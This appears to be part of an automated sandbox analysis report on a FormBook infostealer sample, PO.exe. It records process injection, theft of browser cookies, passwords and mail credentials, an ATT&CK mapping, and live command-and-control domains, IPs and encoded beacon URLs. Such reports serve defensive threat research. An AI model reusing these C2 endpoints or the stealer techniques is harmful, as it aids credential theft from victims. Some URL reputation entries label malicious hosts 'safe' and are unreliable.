                Source: C:\Users\user\Desktop\PO.exe Queries volume information: C:\Windows\Fonts\constanb.ttf VolumeInformation
                Source: C:\Users\user\Desktop\PO.exe Queries volume information: C:\Windows\Fonts\constanz.ttf VolumeInformation
                Source: C:\Users\user\Desktop\PO.exe Queries volume information: C:\Windows\Fonts\corbel.ttf VolumeInformation
                Source: C:\Users\user\Desktop\PO.exe Queries volume information: C:\Windows\Fonts\corbell.ttf VolumeInformation
                Source: C:\Users\user\Desktop\PO.exe Queries volume information: C:\Windows\Fonts\corbeli.ttf VolumeInformation
                Source: C:\Users\user\Desktop\PO.exe Queries volume information: C:\Windows\Fonts\corbelli.ttf VolumeInformation
                Source: C:\Users\user\Desktop\PO.exe Queries volume information: C:\Windows\Fonts\corbelb.ttf VolumeInformation
                Source: C:\Users\user\Desktop\PO.exe Queries volume information: C:\Windows\Fonts\corbelz.ttf VolumeInformation
                Source: C:\Users\user\Desktop\PO.exe Queries volume information: C:\Windows\Fonts\cour.ttf VolumeInformation
                Source: C:\Users\user\Desktop\PO.exe Queries volume information: C:\Windows\Fonts\couri.ttf VolumeInformation
                Source: C:\Users\user\Desktop\PO.exe Queries volume information: C:\Windows\Fonts\courbd.ttf VolumeInformation
                Source: C:\Users\user\Desktop\PO.exe Queries volume information: C:\Windows\Fonts\courbi.ttf VolumeInformation
                Source: C:\Users\user\Desktop\PO.exe Queries volume information: C:\Windows\Fonts\ebrima.ttf VolumeInformation
                Source: C:\Users\user\Desktop\PO.exe Queries volume information: C:\Windows\Fonts\ebrimabd.ttf VolumeInformation
                Source: C:\Users\user\Desktop\PO.exe Queries volume information: C:\Windows\Fonts\framd.ttf VolumeInformation
                Source: C:\Users\user\Desktop\PO.exe Queries volume information: C:\Windows\Fonts\FRADM.TTF VolumeInformation
                Source: C:\Users\user\Desktop\PO.exe Queries volume information: C:\Windows\Fonts\FRADMIT.TTF VolumeInformation
                Source: C:\Users\user\Desktop\PO.exe Queries volume information: C:\Windows\Fonts\FRAMDCN.TTF VolumeInformation
                Source: C:\Users\user\Desktop\PO.exe Queries volume information: C:\Windows\Fonts\gadugi.ttf VolumeInformation
                Source: C:\Users\user\Desktop\PO.exe Queries volume information: C:\Windows\Fonts\gadugib.ttf VolumeInformation
                Source: C:\Users\user\Desktop\PO.exe Queries volume information: C:\Windows\Fonts\georgia.ttf VolumeInformation
                Source: C:\Users\user\Desktop\PO.exe Queries volume information: C:\Windows\Fonts\georgiai.ttf VolumeInformation
                Source: C:\Users\user\Desktop\PO.exe Queries volume information: C:\Windows\Fonts\georgiab.ttf VolumeInformation
                Source: C:\Users\user\Desktop\PO.exe Queries volume information: C:\Windows\Fonts\georgiaz.ttf VolumeInformation
                Source: C:\Users\user\Desktop\PO.exe Queries volume information: C:\Windows\Fonts\impact.ttf VolumeInformation
                Source: C:\Users\user\Desktop\PO.exe Queries volume information: C:\Windows\Fonts\Inkfree.ttf VolumeInformation
                Source: C:\Users\user\Desktop\PO.exe Queries volume information: C:\Windows\Fonts\javatext.ttf VolumeInformation
                Source: C:\Users\user\Desktop\PO.exe Queries volume information: C:\Windows\Fonts\LeelawUI.ttf VolumeInformation
                Source: C:\Users\user\Desktop\PO.exe Queries volume information: C:\Windows\Fonts\LeelUIsl.ttf VolumeInformation
                Source: C:\Users\user\Desktop\PO.exe Queries volume information: C:\Windows\Fonts\LeelaUIb.ttf VolumeInformation
                Source: C:\Users\user\Desktop\PO.exe Queries volume information: C:\Windows\Fonts\lucon.ttf VolumeInformation
                Source: C:\Users\user\Desktop\PO.exe Queries volume information: C:\Windows\Fonts\l_10646.ttf VolumeInformation
                Source: C:\Users\user\Desktop\PO.exe Queries volume information: C:\Windows\Fonts\malgun.ttf VolumeInformation
                Source: C:\Users\user\Desktop\PO.exe Queries volume information: C:\Windows\Fonts\malgunsl.ttf VolumeInformation
                Source: C:\Users\user\Desktop\PO.exe Queries volume information: C:\Windows\Fonts\malgunbd.ttf VolumeInformation
                Source: C:\Users\user\Desktop\PO.exe Queries volume information: C:\Windows\Fonts\himalaya.ttf VolumeInformation
                Source: C:\Users\user\Desktop\PO.exe Queries volume information: C:\Windows\Fonts\msjh.ttc VolumeInformation
                Source: C:\Users\user\Desktop\PO.exe Queries volume information: C:\Windows\Fonts\msjhl.ttc VolumeInformation
                Source: C:\Users\user\Desktop\PO.exe Queries volume information: C:\Windows\Fonts\msjhbd.ttc VolumeInformation
                Source: C:\Users\user\Desktop\PO.exe Queries volume information: C:\Windows\Fonts\msjh.ttc VolumeInformation
                Source: C:\Users\user\Desktop\PO.exe Queries volume information: C:\Windows\Fonts\msjhl.ttc VolumeInformation
                Source: C:\Users\user\Desktop\PO.exe Queries volume information: C:\Windows\Fonts\ntailu.ttf VolumeInformation
                Source: C:\Users\user\Desktop\PO.exe Queries volume information: C:\Windows\Fonts\ntailub.ttf VolumeInformation
                Source: C:\Users\user\Desktop\PO.exe Queries volume information: C:\Windows\Fonts\phagspa.ttf VolumeInformation
                Source: C:\Users\user\Desktop\PO.exe Queries volume information: C:\Windows\Fonts\phagspab.ttf VolumeInformation
                Source: C:\Users\user\Desktop\PO.exe Queries volume information: C:\Windows\Fonts\micross.ttf VolumeInformation
                Source: C:\Users\user\Desktop\PO.exe Queries volume information: C:\Windows\Fonts\taileb.ttf VolumeInformation
                Source: C:\Users\user\Desktop\PO.exe Queries volume information: C:\Windows\Fonts\msyh.ttc VolumeInformation
                Source: C:\Users\user\Desktop\PO.exe Queries volume information: C:\Windows\Fonts\msyhl.ttc VolumeInformation
                Source: C:\Users\user\Desktop\PO.exe Queries volume information: C:\Windows\Fonts\msyhbd.ttc VolumeInformation
                Source: C:\Users\user\Desktop\PO.exe Queries volume information: C:\Windows\Fonts\msyh.ttc VolumeInformation
                Source: C:\Users\user\Desktop\PO.exe Queries volume information: C:\Windows\Fonts\msyhl.ttc VolumeInformation
                Source: C:\Users\user\Desktop\PO.exe Queries volume information: C:\Windows\Fonts\msyhbd.ttc VolumeInformation
                Source: C:\Users\user\Desktop\PO.exe Queries volume information: C:\Windows\Fonts\mingliub.ttc VolumeInformation
                Source: C:\Users\user\Desktop\PO.exe Queries volume information: C:\Windows\Fonts\mingliub.ttc VolumeInformation
                Source: C:\Users\user\Desktop\PO.exe Queries volume information: C:\Windows\Fonts\monbaiti.ttf VolumeInformation
                Source: C:\Users\user\Desktop\PO.exe Queries volume information: C:\Windows\Fonts\mvboli.ttf VolumeInformation
                Source: C:\Users\user\Desktop\PO.exe Queries volume information: C:\Windows\Fonts\mmrtext.ttf VolumeInformation
                Source: C:\Users\user\Desktop\PO.exe Queries volume information: C:\Windows\Fonts\mmrtextb.ttf VolumeInformation
                Source: C:\Users\user\Desktop\PO.exe Queries volume information: C:\Windows\Fonts\Nirmala.ttf VolumeInformation
                Source: C:\Users\user\Desktop\PO.exe Queries volume information: C:\Windows\Fonts\NirmalaS.ttf VolumeInformation
                Source: C:\Users\user\Desktop\PO.exe Queries volume information: C:\Windows\Fonts\NirmalaB.ttf VolumeInformation
                Source: C:\Users\user\Desktop\PO.exe Queries volume information: C:\Windows\Fonts\pala.ttf VolumeInformation
                Source: C:\Users\user\Desktop\PO.exe Queries volume information: C:\Windows\Fonts\palai.ttf VolumeInformation
                Source: C:\Users\user\Desktop\PO.exe Queries volume information: C:\Windows\Fonts\palab.ttf VolumeInformation
                Source: C:\Users\user\Desktop\PO.exe Queries volume information: C:\Windows\Fonts\palabi.ttf VolumeInformation
                Source: C:\Users\user\Desktop\PO.exe Queries volume information: C:\Windows\Fonts\segoepr.ttf VolumeInformation
                Source: C:\Users\user\Desktop\PO.exe Queries volume information: C:\Windows\Fonts\segoeprb.ttf VolumeInformation
                Source: C:\Users\user\Desktop\PO.exe Queries volume information: C:\Windows\Fonts\segoesc.ttf VolumeInformation
                Source: C:\Users\user\Desktop\PO.exe Queries volume information: C:\Windows\Fonts\segoescb.ttf VolumeInformation
                Source: C:\Users\user\Desktop\PO.exe Queries volume information: C:\Windows\Fonts\seguihis.ttf VolumeInformation
                Source: C:\Users\user\Desktop\PO.exe Queries volume information: C:\Windows\Fonts\simsun.ttc VolumeInformation
                Source: C:\Users\user\Desktop\PO.exe Queries volume information: C:\Windows\Fonts\simsunb.ttf VolumeInformation
                Source: C:\Users\user\Desktop\PO.exe Queries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformation
                Source: C:\Users\user\Desktop\PO.exe Queries volume information: C:\Windows\Fonts\SitkaI.ttc VolumeInformation
                Source: C:\Users\user\Desktop\PO.exe Queries volume information: C:\Windows\Fonts\SitkaB.ttc VolumeInformation
                Source: C:\Users\user\Desktop\PO.exe Queries volume information: C:\Windows\Fonts\SitkaZ.ttc VolumeInformation
                Source: C:\Users\user\Desktop\PO.exe Queries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformation
                Source: C:\Users\user\Desktop\PO.exe Queries volume information: C:\Windows\Fonts\SitkaI.ttc VolumeInformation
                Source: C:\Users\user\Desktop\PO.exe Queries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformation
                Source: C:\Users\user\Desktop\PO.exe Queries volume information: C:\Windows\Fonts\SitkaI.ttc VolumeInformation
                Source: C:\Users\user\Desktop\PO.exe Queries volume information: C:\Windows\Fonts\SitkaB.ttc VolumeInformation
                Source: C:\Users\user\Desktop\PO.exe Queries volume information: C:\Windows\Fonts\sylfaen.ttf VolumeInformation
                Source: C:\Users\user\Desktop\PO.exe Queries volume information: C:\Windows\Fonts\symbol.ttf VolumeInformation
                Source: C:\Users\user\Desktop\PO.exe Queries volume information: C:\Windows\Fonts\tahoma.ttf VolumeInformation
                Source: C:\Users\user\Desktop\PO.exe Queries volume information: C:\Windows\Fonts\tahomabd.ttf VolumeInformation
                Source: C:\Users\user\Desktop\PO.exe Queries volume information: C:\Windows\Fonts\timesi.ttf VolumeInformation
                Source: C:\Users\user\Desktop\PO.exe Queries volume information: C:\Windows\Fonts\timesbd.ttf VolumeInformation
                Source: C:\Users\user\Desktop\PO.exe Queries volume information: C:\Windows\Fonts\timesbi.ttf VolumeInformation
                Source: C:\Users\user\Desktop\PO.exe Queries volume information: C:\Windows\Fonts\trebuc.ttf VolumeInformation
                Source: C:\Users\user\Desktop\PO.exe Queries volume information: C:\Windows\Fonts\trebucit.ttf VolumeInformation
                Source: C:\Users\user\Desktop\PO.exe Queries volume information: C:\Windows\Fonts\trebucbd.ttf VolumeInformation
                Source: C:\Users\user\Desktop\PO.exe Queries volume information: C:\Windows\Fonts\trebucbi.ttf VolumeInformation
                Source: C:\Users\user\Desktop\PO.exe Queries volume information: C:\Windows\Fonts\verdana.ttf VolumeInformation
                Source: C:\Users\user\Desktop\PO.exe Queries volume information: C:\Windows\Fonts\verdanai.ttf VolumeInformation
                Source: C:\Users\user\Desktop\PO.exe Queries volume information: C:\Windows\Fonts\verdanab.ttf VolumeInformation
                Source: C:\Users\user\Desktop\PO.exe Queries volume information: C:\Windows\Fonts\verdanaz.ttf VolumeInformation
                Source: C:\Users\user\Desktop\PO.exe Queries volume information: C:\Windows\Fonts\webdings.ttf VolumeInformation
                Source: C:\Users\user\Desktop\PO.exe Queries volume information: C:\Windows\Fonts\wingding.ttf VolumeInformation
                Source: C:\Users\user\Desktop\PO.exe Queries volume information: C:\Windows\Fonts\YuGothR.ttc VolumeInformation
                Source: C:\Users\user\Desktop\PO.exe Queries volume information: C:\Windows\Fonts\YuGothM.ttc VolumeInformation
                Source: C:\Users\user\Desktop\PO.exe Queries volume information: C:\Windows\Fonts\YuGothL.ttc VolumeInformation
                Source: C:\Users\user\Desktop\PO.exe Queries volume information: C:\Windows\Fonts\YuGothB.ttc VolumeInformation
                Source: C:\Users\user\Desktop\PO.exe Queries volume information: C:\Windows\Fonts\YuGothM.ttc VolumeInformation
                Source: C:\Users\user\Desktop\PO.exe Queries volume information: C:\Windows\Fonts\holomdl2.ttf VolumeInformation
                Source: C:\Users\user\Desktop\PO.exe Queries volume information: C:\Windows\Fonts\AGENCYR.TTF VolumeInformation
                Source: C:\Users\user\Desktop\PO.exe Queries volume information: C:\Windows\Fonts\AGENCYB.TTF VolumeInformation
                Source: C:\Users\user\Desktop\PO.exe Queries volume information: C:\Windows\Fonts\BAUHS93.TTF VolumeInformation
                Source: C:\Users\user\Desktop\PO.exe Queries volume information: C:\Windows\Fonts\BELL.TTF VolumeInformation
                Source: C:\Users\user\Desktop\PO.exe Queries volume information: C:\Windows\Fonts\BERNHC.TTF VolumeInformation
                Source: C:\Users\user\Desktop\PO.exe Queries volume information: C:\Windows\Fonts\BOD_CR.TTF VolumeInformation
                Source: C:\Users\user\Desktop\PO.exe Queries volume information: C:\Windows\Fonts\BOD_CI.TTF VolumeInformation
                Source: C:\Users\user\Desktop\PO.exe Queries volume information: C:\Windows\Fonts\BOD_PSTC.TTF VolumeInformation
                Source: C:\Users\user\Desktop\PO.exe Queries volume information: C:\Windows\Fonts\BOOKOSB.TTF VolumeInformation
                Source: C:\Users\user\Desktop\PO.exe Queries volume information: C:\Windows\Fonts\BOOKOSI.TTF VolumeInformation
                Source: C:\Users\user\Desktop\PO.exe Queries volume information: C:\Windows\Fonts\BOOKOSBI.TTF VolumeInformation
                Source: C:\Users\user\Desktop\PO.exe Queries volume information: C:\Windows\Fonts\BRADHITC.TTF VolumeInformation
                Source: C:\Users\user\Desktop\PO.exe Queries volume information: C:\Windows\Fonts\BRITANIC.TTF VolumeInformation
                Source: C:\Users\user\Desktop\PO.exe Queries volume information: C:\Windows\Fonts\BRUSHSCI.TTF VolumeInformation
                Source: C:\Users\user\Desktop\PO.exe Queries volume information: C:\Windows\Fonts\BSSYM7.TTF VolumeInformation
                Source: C:\Users\user\Desktop\PO.exe Queries volume information: C:\Windows\Fonts\COLONNA.TTF VolumeInformation
                Source: C:\Users\user\Desktop\PO.exe Queries volume information: C:\Windows\Fonts\COPRGTL.TTF VolumeInformation
                Source: C:\Users\user\Desktop\PO.exe Queries volume information: C:\Windows\Fonts\CURLZ___.TTF VolumeInformation
                Source: C:\Users\user\Desktop\PO.exe Queries volume information: C:\Windows\Fonts\DUBAI-REGULAR.TTF VolumeInformation
                Source: C:\Users\user\Desktop\PO.exe Queries volume information: C:\Windows\Fonts\DUBAI-BOLD.TTF VolumeInformation
                Source: C:\Users\user\Desktop\PO.exe Queries volume information: C:\Windows\Fonts\ELEPHNTI.TTF VolumeInformation
                Source: C:\Users\user\Desktop\PO.exe Queries volume information: C:\Windows\Fonts\ENGR.TTF VolumeInformation
                Source: C:\Users\user\Desktop\PO.exe Queries volume information: C:\Windows\Fonts\ERASLGHT.TTF VolumeInformation
                Source: C:\Users\user\Desktop\PO.exe Queries volume information: C:\Windows\Fonts\ERASBD.TTF VolumeInformation
                Source: C:\Users\user\Desktop\PO.exe Queries volume information: C:\Windows\Fonts\FREESCPT.TTF VolumeInformation
                Source: C:\Users\user\Desktop\PO.exe Queries volume information: C:\Windows\Fonts\FRSCRIPT.TTF VolumeInformation
                Source: C:\Users\user\Desktop\PO.exe Queries volume information: C:\Windows\Fonts\GARAIT.TTF VolumeInformation
                Source: C:\Users\user\Desktop\PO.exe Queries volume information: C:\Windows\Fonts\GOTHICBI.TTF VolumeInformation
                Source: C:\Users\user\Desktop\PO.exe Queries volume information: C:\Windows\Fonts\GOUDOS.TTF VolumeInformation
                Source: C:\Users\user\Desktop\PO.exe Queries volume information: C:\Windows\Fonts\HTOWERT.TTF VolumeInformation
                Source: C:\Users\user\Desktop\PO.exe Queries volume information: C:\Windows\Fonts\INFROMAN.TTF VolumeInformation
                Source: C:\Users\user\Desktop\PO.exe Queries volume information: C:\Windows\Fonts\ITCEDSCR.TTF VolumeInformation
                Source: C:\Users\user\Desktop\PO.exe Queries volume information: C:\Windows\Fonts\LSANS.TTF VolumeInformation
                Source: C:\Users\user\Desktop\PO.exe Queries volume information: C:\Windows\Fonts\LTYPEBO.TTF VolumeInformation
                Source: C:\Users\user\Desktop\PO.exe Queries volume information: C:\Windows\Fonts\MISTRAL.TTF VolumeInformation
                Source: C:\Users\user\Desktop\PO.exe Queries volume information: C:\Windows\Fonts\NIAGSOL.TTF VolumeInformation
                Source: C:\Users\user\Desktop\PO.exe Queries volume information: C:\Windows\Fonts\PAPYRUS.TTF VolumeInformation
                Source: C:\Users\user\Desktop\PO.exe Queries volume information: C:\Windows\Fonts\STENCIL.TTF VolumeInformation
                Source: C:\Users\user\Desktop\PO.exe Queries volume information: C:\Windows\Fonts\micross.ttf VolumeInformation
                Source: C:\Users\user\Desktop\PO.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
                Source: C:\Users\user\Desktop\PO.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Stealing of Sensitive Information

Source: Yara match | File source: 2.2.PO.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 2.2.PO.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 00000007.00000002.3001987219.0000000000420000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000007.00000002.3003697143.0000000000970000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000002.00000002.2274480081.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000008.00000002.3003263592.0000000000CD0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000002.00000002.2275144613.0000000001460000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000007.00000002.3003792289.00000000009C0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000006.00000002.3003894654.00000000027B0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000002.00000002.2276815153.0000000001A10000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: C:\Windows\SysWOW64\net.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Cookies
Source: C:\Windows\SysWOW64\net.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies
Source: C:\Windows\SysWOW64\net.exe | File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies
Source: C:\Windows\SysWOW64\net.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
Source: C:\Windows\SysWOW64\net.exe | File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
Source: C:\Windows\SysWOW64\net.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Local State
Source: C:\Windows\SysWOW64\net.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local State
Source: C:\Windows\SysWOW64\net.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
Source: C:\Windows\SysWOW64\net.exe | Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\

Remote Access Functionality

Source: Yara match | File source: 2.2.PO.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 2.2.PO.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 00000007.00000002.3001987219.0000000000420000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000007.00000002.3003697143.0000000000970000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000002.00000002.2274480081.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000008.00000002.3003263592.0000000000CD0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000002.00000002.2275144613.0000000001460000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000007.00000002.3003792289.00000000009C0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000006.00000002.3003894654.00000000027B0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000002.00000002.2276815153.0000000001A10000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
MITRE ATT&CK Matrix

| Reconnaissance | Resource Development | Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Command and Control | Exfiltration | Impact |
| --- | --- | --- | --- | --- | --- | --- | --- | --- | --- | --- | --- | --- | --- |
| Gather Victim Identity Information | Acquire Infrastructure | Valid Accounts | Windows Management Instrumentation | 1 DLL Side-Loading | 412 Process Injection | 1 Masquerading | 1 OS Credential Dumping | 121 Security Software Discovery | Remote Services | 1 Email Collection | 1 Encrypted Channel | Exfiltration Over Other Network Medium | Abuse Accessibility Features |
| Credentials | Domains | Default Accounts | Scheduled Task/Job | Boot or Logon Initialization Scripts | 1 Abuse Elevation Control Mechanism | 1 Disable or Modify Tools | LSASS Memory | 2 Process Discovery | Remote Desktop Protocol | 1 Archive Collected Data | 3 Ingress Tool Transfer | Exfiltration Over Bluetooth | Network Denial of Service |
| Email Addresses | DNS Server | Domain Accounts | At | Logon Script (Windows) | 1 DLL Side-Loading | 41 Virtualization/Sandbox Evasion | Security Account Manager | 41 Virtualization/Sandbox Evasion | SMB/Windows Admin Shares | 1 Data from Local System | 4 Non-Application Layer Protocol | Automated Exfiltration | Data Encrypted for Impact |
| Employee Names | Virtual Private Server | Local Accounts | Cron | Login Hook | Login Hook | 412 Process Injection | NTDS | 1 Application Window Discovery | Distributed Component Object Model | Input Capture | 4 Application Layer Protocol | Traffic Duplication | Data Destruction |
| Gather Victim Network Information | Server | Cloud Accounts | Launchd | Network Logon Script | Network Logon Script | 1 Deobfuscate/Decode Files or Information | LSA Secrets | 2 File and Directory Discovery | SSH | Keylogging | Fallback Channels | Scheduled Transfer | Data Encrypted for Impact |
| Domain Properties | Botnet | Replication Through Removable Media | Scheduled Task | RC Scripts | RC Scripts | 1 Abuse Elevation Control Mechanism | Cached Domain Credentials | 113 System Information Discovery | VNC | GUI Input Capture | Multiband Communication | Data Transfer Size Limits | Service Stop |
| DNS | Web Services | External Remote Services | Systemd Timers | Startup Items | Startup Items | 4 Obfuscated Files or Information | DCSync | Remote System Discovery | Windows Remote Management | Web Portal Capture | Commonly Used Port | Exfiltration Over C2 Channel | Inhibit System Recovery |
| Network Trust Dependencies | Serverless | Drive-by Compromise | Container Orchestration Job | Scheduled Task/Job | Scheduled Task/Job | 12 Software Packing | Proc Filesystem | System Owner/User Discovery | Cloud Services | Credential API Hooking | Application Layer Protocol | Exfiltration Over Alternative Protocol | Defacement |
| Network Topology | Malvertising | Exploit Public-Facing Application | Command and Scripting Interpreter | At | At | 1 DLL Side-Loading | /etc/passwd and /etc/shadow | Network Sniffing | Direct Cloud VM Connections | Data Staged | Web Protocols | Exfiltration Over Symmetric Encrypted Non-C2 Protocol | Internal Defacement |
Behavior Graph

ID: 1612356 | Sample: PO.exe | Start date: 11/02/2025 | Architecture: WINDOWS | Score: 100

Start
  Contacted: www.erectus.xyz, www.globalcase.website, 3 other IPs or domains
  Signatures: Suricata IDS alerts for network traffic; Multi AV Scanner detection for submitted file; Yara detected FormBook; 4 other signatures
  www.erectus.xyz: Performs DNS queries to domains with low reputation
  -> PO.exe (started)
     Dropped: C:\Users\user\AppData\Local\...\PO.exe.log (ASCII)
     Signature: Injects a PE file into a foreign processes
     -> PO.exe (started)
        Signature: Maps a DLL or memory area into another process
        -> vfAu7gBmmnuGpQ5Y.exe (injected)
           Signature: Found direct / indirect Syscall (likely to bypass EDR)
           -> net.exe (started)
              Signatures: Tries to steal Mail credentials (via file / registry access); Tries to harvest and steal browser information (history, passwords, etc); Modifies the context of a thread in another process (thread injection); 3 other signatures
              -> vfAu7gBmmnuGpQ5Y.exe (injected)
                 Contacted: www.globalcase.website 192.64.118.221, ports 50018, 50019, 50020, NAMECHEAP-NETUS, United States; www.fineitemrealm.shop 162.210.195.109, ports 49995, 50011, 50016, LEASEWEB-USA-WDCUS, United States; 3 other IPs or domains
                 Signature: Found direct / indirect Syscall (likely to bypass EDR)
              -> firefox.exe (started)

| Source | Detection | Scanner | Label |
| --- | --- | --- | --- |
| PO.exe | 69% | Virustotal | |
| PO.exe | 68% | ReversingLabs | Win32.Trojan.Leonem |
| PO.exe | 100% | Joe Sandbox ML | |

No Antivirus matches
| Source | Detection | Scanner | Label |
| --- | --- | --- | --- |
| http://www.adjokctp.icu | 0% | Avira URL Cloud | safe |
| http://www.globalcase.website/6wg4/?92tD=e2yux1VtJoqvcqg+8AukcEcVwMVT+Sjl/1eDxHdMS7mzrr0SxU8linEjJM3sYoPzrw66qF8Oj5XhrJTjkHQqvun9I0YvCDnVTdCWSCRzvr5pslrpMRangDo=&ODj=aVdxTb | 0% | Avira URL Cloud | safe |
| http://www.adjokctp.icu/wurw/ | 0% | Avira URL Cloud | safe |
| http://www.cloud-kuprof2.click/9kj6/?92tD=AVccbOSLL/+N4XgwVpb4SHGSnAGJIc2w8rOLkxaC3AvUfASlWswjdaveGA5SPzmQwtpsnNNz41sXTUjryKzeRTK3cv4i7oHGDeN1DGdqMP4Wc9jKpdKBVJQ=&ODj=aVdxTb | 0% | Avira URL Cloud | safe |
| http://www.fineitemrealm.shop/c3c5/?92tD=2X6TFJqSBkan8qpDKqB3foPaC+q2tUyYHYLE9NMufHiS9CuR8q99XAqJ5/x0mYnwttbXYsDuQMFmGta9SThVpupVHhzg9UTUXnuJin70LkdCs8vRTrMDdWY=&ODj=aVdxTb | 0% | Avira URL Cloud | safe |
| http://www.fineitemrealm.shop/c3c5/ | 0% | Avira URL Cloud | safe |
| http://www.erectus.xyz/cjko/?92tD=3gJzY2hwuTATu+wgM7M2aW4tC9U6eyI05FbsBlp+k+3zOYzda5y9e/SDhnP1PIg0Yh4jO5HOCpt/RLpJrfWBqfOHUxMMiqNoXrahRjaCwOMkcSKIcBEhJK4=&ODj=aVdxTb | 0% | Avira URL Cloud | safe |
| http://www.erectus.xyz/cjko/ | 0% | Avira URL Cloud | safe |
| http://www.sakkal.com(6 | 0% | Avira URL Cloud | safe |
| http://www.globalcase.website/6wg4/ | 0% | Avira URL Cloud | safe |
| Name | IP | Active | Malicious | Antivirus Detection | Reputation |
| --- | --- | --- | --- | --- | --- |
| www.fineitemrealm.shop | 162.210.195.109 | true | false | | high |
| www.adjokctp.icu | 104.21.35.208 | true | false | | high |
| www.erectus.xyz | 13.248.169.48 | true | false | | high |
| www.cloud-kuprof2.click | 57.129.59.27 | true | false | | high |
| www.globalcase.website | 192.64.118.221 | true | false | | high |
| Name | Malicious | Antivirus Detection | Reputation |
| --- | --- | --- | --- |
| http://www.globalcase.website/6wg4/?92tD=e2yux1VtJoqvcqg+8AukcEcVwMVT+Sjl/1eDxHdMS7mzrr0SxU8linEjJM3sYoPzrw66qF8Oj5XhrJTjkHQqvun9I0YvCDnVTdCWSCRzvr5pslrpMRangDo=&ODj=aVdxTb | false | Avira URL Cloud: safe | unknown |
| http://www.adjokctp.icu/wurw/ | true | Avira URL Cloud: safe | unknown |
| http://www.fineitemrealm.shop/c3c5/?92tD=2X6TFJqSBkan8qpDKqB3foPaC+q2tUyYHYLE9NMufHiS9CuR8q99XAqJ5/x0mYnwttbXYsDuQMFmGta9SThVpupVHhzg9UTUXnuJin70LkdCs8vRTrMDdWY=&ODj=aVdxTb | false | Avira URL Cloud: safe | unknown |
| http://www.cloud-kuprof2.click/9kj6/?92tD=AVccbOSLL/+N4XgwVpb4SHGSnAGJIc2w8rOLkxaC3AvUfASlWswjdaveGA5SPzmQwtpsnNNz41sXTUjryKzeRTK3cv4i7oHGDeN1DGdqMP4Wc9jKpdKBVJQ=&ODj=aVdxTb | false | Avira URL Cloud: safe | unknown |
| http://www.globalcase.website/6wg4/ | false | Avira URL Cloud: safe | unknown |
| http://www.erectus.xyz/cjko/?92tD=3gJzY2hwuTATu+wgM7M2aW4tC9U6eyI05FbsBlp+k+3zOYzda5y9e/SDhnP1PIg0Yh4jO5HOCpt/RLpJrfWBqfOHUxMMiqNoXrahRjaCwOMkcSKIcBEhJK4=&ODj=aVdxTb | false | Avira URL Cloud: safe | unknown |
| http://www.fineitemrealm.shop/c3c5/ | false | Avira URL Cloud: safe | unknown |
| http://www.erectus.xyz/cjko/ | false | Avira URL Cloud: safe | unknown |
| IP | Domain | Country | ASN | ASN Name | Malicious |
| --- | --- | --- | --- | --- | --- |
| 192.64.118.221 | www.globalcase.website | United States | 22612 | NAMECHEAP-NETUS | false |
| 13.248.169.48 | www.erectus.xyz | United States | 16509 | AMAZON-02US | false |
| 104.21.35.208 | www.adjokctp.icu | United States | 13335 | CLOUDFLARENETUS | false |
| 57.129.59.27 | www.cloud-kuprof2.click | Belgium | 2686 | ATGS-MMD-ASUS | false |
| 162.210.195.109 | www.fineitemrealm.shop | United States | 30633 | LEASEWEB-USA-WDCUS | false |
                                                                                              Joe Sandbox version:42.0.0 Malachite
                                                                                              Analysis ID:1612356
                                                                                              Start date and time:2025-02-11 18:50:39 +01:00
                                                                                              Joe Sandbox product:CloudBasic
                                                                                              Overall analysis duration:0h 9m 22s
                                                                                              Hypervisor based Inspection enabled:false
                                                                                              Report type:full
                                                                                              Cookbook file name:default.jbs
                                                                                              Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                                              Number of analysed new started processes analysed:9
                                                                                              Number of new started drivers analysed:0
